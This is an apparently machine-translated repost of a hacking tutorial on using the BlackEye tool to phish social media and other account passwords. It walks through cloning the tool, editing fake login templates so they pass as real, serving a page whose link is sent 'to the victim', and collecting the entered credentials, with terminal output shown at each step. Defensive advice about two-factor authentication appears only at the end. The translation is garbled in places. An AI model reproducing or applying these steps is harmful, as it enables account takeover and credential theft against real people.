قالب وردپرس درنا توس
Home / Tips and Tricks / Phishen for Social Media and Other Account Passwords with BlackEye «Null Byte :: WonderHowTo

Phishen for Social Media and Other Account Passwords with BlackEye «Null Byte :: WonderHowTo



Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on websites such as Facebook, Instagram and Twitter are often based on phishing scams. These password-stealing attacks rely on tricking users into entering their passwords into a convincing fake web page, and they're getting easier with tools like BlackEye.

BlackEye is a tool for quickly generating phishing pages targeting social media websites, making it much easier to phish targets on the same network. After redirecting a target to the phishing page, it's easy to capture passwords on social media accounts collected from unwitting targets.

BlackEye for Social Media Phishing

Users are very confident in their social media accounts. If the target doesn't have 2FA enabled, the ease with which an attacker can access it can be surprising. A single mistake when typing a password on the wrong website can be enough to lose access to your account. BlackEye is a proof-of-concept that shows how these phishing pages don't need to be refined or modified to work effectively.

BlackEye is a simple bash script that presents several templates to choose from so you can choose which social media website to emulate. From there, it creates a functional phishing site on your device, with the ability to forward ports or otherwise connect to your target's machine.

Supported Social Media Sites

BlackEye supports 32 different websites with phishing. templates, but these vary in quality. It's best to test them out before implementing them, as some have flaws that they can give away if a user is paying attention. While the default phishing pages that come with BlackEye are pretty good, it's always handy to be able to change them. That way, you can remove things like a copyright notice from the wrong year.

The more interesting websites that BlackEye supports include Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal, and Google. You can test it quickly by following the steps below and clicking on the phishing URL to find out how realistic each template looks before using it.

What You Need

BlackEye is an extremely simple tool, but it works best on Kali Linux. That's because of the number of dependencies it's running on to run, but these can be installed on Ubuntu or Debian devices if needed. Once you have fully updated a Kali distro, you should be ready to install BlackEye.

Step 1: Download and test BlackEye

First we need to clone the source from BlackEye & # 39; s GitHub repository. To do this, open a new terminal window and type the following git and cd statements.

  ~ $ git clone https://github.com/thelinuxchoice/blackeye

Cloning in & # 39; blackeye & # 39; ...
remote: List objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB / s, ready.
Solve deltas: 100% (101/101), done.

~ $ cd blackeye

~ / blackeye $ 

That should install the BlackEye repository and allow it to run from the blackeye directory with the bash blackeye.sh command. When we run the command, we should see the splash screen below.

  ~ / blackeye $ bash blackeye.sh

:: Disclaimer: Developers accept no liability and are not:
:: responsible for abuse or damage caused by BlackEye. ::
:: Can only be used for educational horses! ::

:: Attacking targets without mutual consent is illegal! ::

[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] UK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODE BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka 

Step 2: Customizing Phishing Websites

If we don't like something like an expired copyright notice, we can change it quite easily. First, exit the bash script back to the blackeye folder. Then we type ls to see the folder sites in the BlackEye repository.

  ~ / blackeye $ ls

blackeye.sh LICENSE-README.md sites 

We can navigate to it using the command cd sites . Then type ls to see all the phishing site templates available for modification.

  ~ / blackeye $ cd sites
~ / blackeye / sites $ ls

adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress
badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex 

To edit Protonmail, we can type cd protonmail and then ls again to see the files in that folder. You should see something like the files below:

  ~ / blackeye / sites $ cd protonmail
~ / blackeye / sites / protonmail $ ls

index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt 

To edit the HTML of the phishing page, you can do this directly by login to open. html with a text editor, so you can easily update all copyright notices or other details.

Step 3: Serve the phishing page

To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then run the command bash blackeye.sh to return to the menu for selecting phishing pages. Here we select eBay, number 18.

  ~ / blackeye / sites / protonmail $ cd
~ $ cd blackeye
~ / blackeye $ bash blackeye.sh

[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] UK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODE BY: @thelinuxchoice
UPGRADE BY: @suljot_gjoka

[*] Choose an option: 18 

After entering the number of the site you want to create, press and enter . We are then asked to provide our IP address. If you press enter without adding one, it will try to add yours by default, but this doesn't always work. After entering your IP address, you will see approximately the prompt below.

  [*] Set your local IP (default 10.0.6.27):

[*] Start PHP server ...
[*] Send this link to the victim: 192.168.0.16
[*] Waiting victim open the link ... 

Then navigate to the phishing link in a browser to see the result of your phishing site.

Step 4: Fix a password

When you open the site in a browser it should look something like this:

By opening the link , the script reports back on the type of devices currently accessing the phishing page. [19659013] [*] Waiting victim open the link …

[*] IP found!
[*] Victim IP: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 60.0) Gecko / 20100101 Firefox / 60.0
[*] Saved: shopping / saved.ip.txt

Once the target enters their credentials, they are redirected to the real eBay page, creating the illusion of a successful login.

On the hacker's side, BlackEye gives us the credentials that our goal just entered.

  [*] Waiting data ...

[*] Login credentials found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: sites / shopping / saved.usernames.txt 

For example, we intercepted and saved the login details that a target entered on our phishing page!

Social media phishing sites are quick and easy [19659004] When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single error can lead to your password being stolen and used to access your account by an attacker. So set up 2FA on Facebook, Instagram and whatever other accounts you have.

Another step in improving security is using a hardware security key to require new devices to use your key to log in, display stolen passwords, and even intercepted text messages to no avail. Keep in mind that while BlackEye makes phishing easy, it's not legal to steal passwords from accounts you don't have permission to use.

Hope you enjoyed this guide to social media phishing passwords! If you have any questions about this social media phishing tools tutorial, please post them below, and if you have any comment or idea for a future episode, feel free to contact me at Twitter @KodyKinzie .

Don't Miss: Steal Wi-Fi Passwords With A Malicious Double Attack

—–
Learn to Code with Null Byte & # 39; s Beginner Python Course.

Buy now for $ 99.99>

Cover photo and screenshots by Kody / Null Byte




Source link